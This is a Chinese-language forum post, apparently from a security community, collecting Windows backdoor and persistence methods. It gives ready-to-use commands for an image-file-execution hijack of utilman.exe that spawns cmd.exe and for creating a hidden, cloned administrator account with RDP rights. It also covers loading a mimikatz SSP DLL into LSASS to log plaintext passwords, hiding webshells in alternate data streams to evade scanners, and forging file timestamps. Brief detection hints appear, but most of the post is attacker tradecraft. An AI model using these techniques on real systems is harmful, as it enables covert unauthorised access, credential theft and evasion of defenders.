TL;DR

  • Definition - What does Persistence mean?
    Persistence refers to object and process characteristics that continue to exist even after the process that created it ceases or the machine it is running on is powered off. When an object or state is created and needs to be persistent, it is saved in a non-volatile storage location, like a hard drive, versus a temporary file or volatile random access memory (RAM).
  • 这里把自己认知里面的一些windows backdoor和persistence的方式方法总结一下,并尽量持续更新。

常见backdoor和persistence方式方法

系统工具替换后门

Image 劫持辅助工具管理器
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f


  • 类似的程序有osk.exe、Narrator.exe、Magnify.exe等。
  • 优点:简单
  • 缺点:易被检测
  • 排查:工具autoruns
  • 20191016更新
    参考文章打造不一样的Shfit映像劫持后门
    用到了windows sdk里的gflags.exe工具(工具下载地址),这个工具里面有个silent process exit功能,大意是在调试某个程序静态退出的时候可以关联绑定某个程序去静默执行,工具对注册表一些键值进行了修改,此外通过autoruns工具检测不出来。

后门账号

  • 创建克隆administrator账号,且通过命令net user 以及控制面板中的管理账户无法看到。
    1.创建后门用户
    net user defaultuser0$ somepasswordhere /add /y
    net localgroup administrators defaultuser0$ /add
    net localgroup "remote desktop users" defaultuser0$ /add
    2.之后将administrator用户对应的Users中的F值复制替换后门账户的F值

    3.导出User下面的后门账户以及name下面的后门账户两个文件。

    4.通过命令删除刚才的后门用户
    net user defaultuser0$ /del
    5.通过注册表导入刚才保存的两个注册表

  • 参考文章 Windows系统的帐户隐藏

明文账号记录

  • 安全支持提供程序(SSP)是Windows API,用于扩展Windows身份验证机制。 LSASS进程在Windows启动期间加载安全支持提供程序DLL。这个时候攻击者可以将精心构造的dll加载之,这个dll可获取到lsass进程中的明文账号密码信息。mimikatz(mimilib.dll或memssp内存补丁方式)实现了这一功能,并把记录到的明文账号密码信息保存在本地。
  • 详见文章Persistence – Security Support Provider

文件隐藏

attrib命令隐藏

  • windows自带命令行工具attrib用来显示或更改文件属性。

    * 优点:简单,一般的工具(D盾)扫描不到
  • 优点:简单
  • 缺点:暂无
  • 排查:使用attrib命令或者D盾

使用ADS流隐藏webshell(重点!!)

  • 使用ADS流隐藏webshell,目前可过D盾扫描,注意ADS的一句话木马无法直接连接,可以使用php的include去包含执行


    文章参考:利用ADS隐藏webshell
    文章参考: Windows ADS在渗透测试中的妙用
  • 此外应该注意修改文件的timestamp,可使用如下的powershell命令或者使用NewFileTime工具
$(Get-Item ).creationtime=$(Get-Date "mm/dd/yyyy hh:mm am/pm")
点击收藏 | 13 关注 | 2
登录 后跟帖